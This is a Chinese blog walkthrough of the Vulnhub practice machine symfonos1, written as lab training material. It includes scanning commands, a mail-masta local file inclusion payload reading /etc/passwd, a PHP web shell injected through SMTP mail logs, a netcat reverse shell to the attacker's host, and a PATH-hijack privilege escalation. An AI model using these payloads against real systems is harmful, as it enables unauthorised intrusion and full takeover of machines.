【Vulnhub】之symfonos1

网络安全小时光

已于 2023-04-17 14:57:31 修改

阅读量462

点赞数 2

分类专栏：网络安全 vulnhub 靶机文章标签：网络安全安全性测试安全

于 2023-04-17 14:46:51 首次发布

本文链接：https://blog.csdn.net/zg_111/article/details/130193905

版权

网络安全同时被 3 个专栏收录

18 篇文章 0 订阅

订阅专栏

靶机

10 篇文章 0 订阅

订阅专栏

vulnhub

9 篇文章 2 订阅

订阅专栏

一、部署方法

在官网上下载靶机ova环境：https://download.vulnhub.com/symfonos/symfonos1.7z
使用VMware搭建靶机环境
攻击机使用VMware上搭建的kali
靶机和攻击机之间使用NAT模式，保证靶机和攻击机放置于同一网段中。

二、靶机下载安装

靶机下载与安装参考之前文章：搭建Vulnhub靶机详细步骤

三、渗透测试

1. 确认目标

扫描同网段机器

arp-scan -l

在这里插入图片描述

确认靶机IP：192.168.15.137

2. 收集信息

使用nmap工具对靶机进行深度扫描

nmap -A -T4 -p- 192.168.15.137

在这里插入图片描述

扫描完成发现目标靶机对外开放了22/25/80/139/445端口

先浏览器访问下80端口

http://192.168.15.137

发现只有一张图片，使用dirsearch工具扫描也没有发现其他可访问路径

dirsearch -u http:192.168.15.137

在这里插入图片描述

80端口暂时没有发现可利用点，前面nmap扫描发现靶机还开放了smb端口，所以我们使用smbclient工具列出靶机的共享文件夹

smbclient -L 192.168.15.137

在这里插入图片描述

发现helios和anonymous两个文件夹，我们依次去访问下这两个文件夹，发现anonymous文件夹没有密码也可访问，并在文件夹下发现了attention.txt。

smbclient //192.168.15.137/anonymous

在这里插入图片描述

在attention.txt我们发现三个密码：epidioko、qwerty、baseball，使用这三个密码尝试去访问下helios文件夹，发现使用qwerty密码可访问成功

smbclient //192.168.15.137/helios -U helios

在这里插入图片描述

在helios文件夹下发现research.txt和todo.txt两个文件，下载下来查看

在这里插入图片描述

在todo.txt中我们发现给我们透露了一个网站路径‘/h3l105’，我们通过浏览器访问下

http://192.168.15.137/h3l105

在这里插入图片描述

点击页面中链接，发现跳转到了 symfonos.local 域名

在这里插入图片描述

因此需要我们在hosts文件中添加 192.168.15.137 symfonos.local

vi /etc/hosts

在这里插入图片描述

保存配置后发现可以正常跳转

在这里插入图片描述

发现靶机站点是使用的wordpress搭建的，我们使用wpscan扫描工具扫描下

wpscan --url http://symfonos.local

在这里插入图片描述

扫描发现存在两个插件mail-masta、site-editor

我们使用searchsploit查找插件漏洞

searchsploit mail masta

在这里插入图片描述

发现三个历史漏洞，两个本地文件包含漏洞和一个SQL注入漏洞

3. 漏洞利用

由于SQL注入漏洞须在已取得后台权限的情况下才能使用，所以这里选择本地文件包含漏洞

通过路径找到payload

cat /usr/share/exploitdb/exploits/php/webapps/40290.txt

在这里插入图片描述

payload：

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

浏览器访问payload验证，发现漏洞可利用

在这里插入图片描述

前面发现靶机25端口开放的smtp邮件协议，想到这里包含helios的邮件日志

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios

在这里插入图片描述

成功包含！
接下来我们可以通过telnet远程向helios发送邮件

telnet 192.168.15.137 25

在这里插入图片描述

telnet连接后，我们发送邮件内容

MAIL FROM: MALABIS
RCPT TO: helios
data
<?php system($_GET['shell']); ?>
.
QUIT

在这里插入图片描述

执行查询id的命令

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&shell=id

在这里插入图片描述
执行成功！

4. 反弹shell

我们可以在此基础上进行反弹shell的操作

首先我们在kali上开启监听：

nc -lvnp 6666

在这里插入图片描述

接下来我们构造反弹shell

nc -e /bin/bash 192.168.15.135 6666

在浏览器中访问payload

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&shell=nc%20-e%20/bin/bash%20192.168.15.135%206666

在这里插入图片描述

此时我们可以看到已经成功获取shell

将普通shell转化为交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

5. 提权

获得shell后，我们通过find查找SUID权限的二进制文件

find / -perm -4000 -type f 2>/dev/null

在这里插入图片描述

在查找结果中我们看到一个通常不属于这里面的一个二进制文件/opt/statuscheck

使用strings命令打开

strings 在二进制目标文件或其他二进制文件中查找可打印的字符串。

strings /opt/statuscheck

在这里插入图片描述

我们发现在执行过程中调用了curl命令

这里我们可以建一个假的curl，追加/tmp到环境变量开头，这样系统调用curl的时候就可以执行假的curl，进而达到提权效果

cd /tmp
echo "/bin/sh" > curl
chmod 777 curl
export PATH=/tmp:$PATH
echo $PATH
/opt/statuscheck

在这里插入图片描述

此时我们可以看到已经成功获取root权限，并在/root目录下成功发现proof

在这里插入图片描述

网络安全小时光

关注

2
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
【Vulnhub】之symfonos1

在attention.txt我们发现三个密码：epidioko、qwerty、baseball，使用这三个密码尝试去访问下helios文件夹，发现使用qwerty密码可访问成功。发现helios和anonymous两个文件夹，我们依次去访问下这两个文件夹，发现anonymous文件夹没有密码也可访问，并在文件夹下发现了attention.txt。80端口暂时没有发现可利用点，前面nmap扫描发现靶机还开放了smb端口，所以我们使用smbclient工具列出靶机的共享文件夹。
复制链接

扫一扫